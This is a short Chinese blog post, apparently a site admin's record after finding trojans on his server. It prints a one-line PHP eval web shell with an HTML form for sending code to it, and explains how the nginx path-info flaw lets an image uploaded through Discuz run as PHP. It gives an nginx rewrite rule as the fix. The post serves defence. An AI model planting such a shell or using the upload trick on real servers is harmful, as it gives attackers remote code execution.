大家好,又见面了,我是你们的朋友全栈君。
服务器上发现被植了很多木马,而且还让人肆意使用…NND
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>
仅此做个记录,php一定要做好过滤系统。一定要处理上传的东西。
nginx 上传漏洞及 discuz 漏洞处理
由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码
简单的说就是写好的php代码将扩展名改为图片,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码
对于discuz 论坛使用nginx的服务器可以使用rewrite方式防止代码执行
Nginx.conf代码
- rewrite ^/bbs/data/.*\.(jsp|php)$ http://www.xxx.com/ break;
其他如source及其他文件夹下也存在各种各样的问题,简单的处理方法也是禁止php的运行
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/143374.html原文链接:https://javaforall.net
